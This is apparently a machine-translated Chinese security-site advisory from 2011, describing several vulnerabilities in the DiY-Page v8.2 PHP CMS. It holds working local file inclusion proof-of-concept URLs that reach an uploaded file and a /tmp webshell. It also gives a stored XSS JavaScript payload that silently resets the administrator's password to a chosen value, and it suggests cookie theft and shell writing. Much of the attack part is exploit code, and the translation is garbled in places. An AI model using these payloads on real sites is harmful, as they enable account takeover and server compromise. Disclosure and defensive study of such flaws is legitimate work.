DiY-Page and then blast multiple vulnerabilities-vulnerability warning-the black bar safety net

2011-02-15T00:00:00
ID MYHACK58:62201129160
Type myhack58
Reporter 佚名
Modified 2011-02-15T00:00:00

Description

Front someone studied DiY-Page sqlInj vulnerability analysis posts, I followed read Read code, found Diy-Page v8. 2 program also the presence of multiple vulnerabilities including local file inclusion vulnerability, and upload loophole, cross site loophole, etc..

A, local file inclusion vulnerability

| | //js.php ---|---

| $incfile=PATH_PRE.'mod/'.$ _GET['mod'].'/ js/'.$ _GET['name'].'. php'; ---|---

| if(! include$incfile) dperror($l_error['cant_include'],$incfile,true); ---|---

This vulnerability is more obvious, if GPC is off, could have been by upload attachments included, but the program in turn off GPC and using the addslashes function filter. We can also through a number of long filename truncation, or beside the note to upload a webshell to the/tmp folder contains.

POC: http://127.0.0.1/diypage/js.php?mod=dpuser&name=../../../up/2 0 1 1 0 2/20110213_dd7ec931179c4dcb6a8ffb8b8786d20b_17872a. txt. file///////////////// http://127.0.0.1/diypage/js.php?mod=dpuser&name=../../../../tmp/shell

B, xsscross-site vulnerability Cross site More, not filtered, like code:

| if($_POST['issubmit']==true) { ---|---

| $fidarray=trim($_POST['fidarray'],','); ---|---

| $backurl='javascript:history. go(-1);'; ---|---

| $actionurlold=$actionurl; ---|---

| $actionurl.='& amp;do=list&cataid='.$ _GET['cataid']; ---|---

| $entrytitle=$_POST['entrytitle']; ---|---

| $entrycontent=$_POST['entrycontent']; ---|---

| $entrytag=trim($_POST['entrytag']); ---|---

| ...... ---|---

In Publication entry title write js, thisXSSacross the home is also across the background. Since withXSS, can do things a lot, such as the hijacking of the user, steal COOKIE, improve permissions, write shell, etc., the following is to reset the administrator password of js:

| varxmlhttp=false; ---|---

| if(window. XMLHttpRequest){ ---|---

| xmlhttp=newXMLHttpRequest(); ---|---

| }elseif(window. ActiveXObject){ ---|---

| xmlhttp=newActiveXObject("Msxml2. XMLHTTP"); ---|---

| if(! xmlhttp){xmlhttp=newActiveXObject("Microsoft. XMLHTTP");} ---|---

| } ---|---

| varaction="/diypage/admin. php? mod=modcp&formod=dpuser&item=useradm&do=edit&uid=1&page=1&perpage=2 0"; ---|---

| vardata="gid=2&oldgid=2&dpusername=admin&dpusernewpassword=cnryan&usertpl=&regip=&loginip=&dpuseremail=&dpusermoney=0&dpuserintro=&avatar=default. gif&nickname=&issubmit=true"; ---|---

| xmlhttp. open("POST", action, false); ---|---

| xmlhttp. setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); ---|---

| xmlhttp. send(data); ---|---

[1] [2] next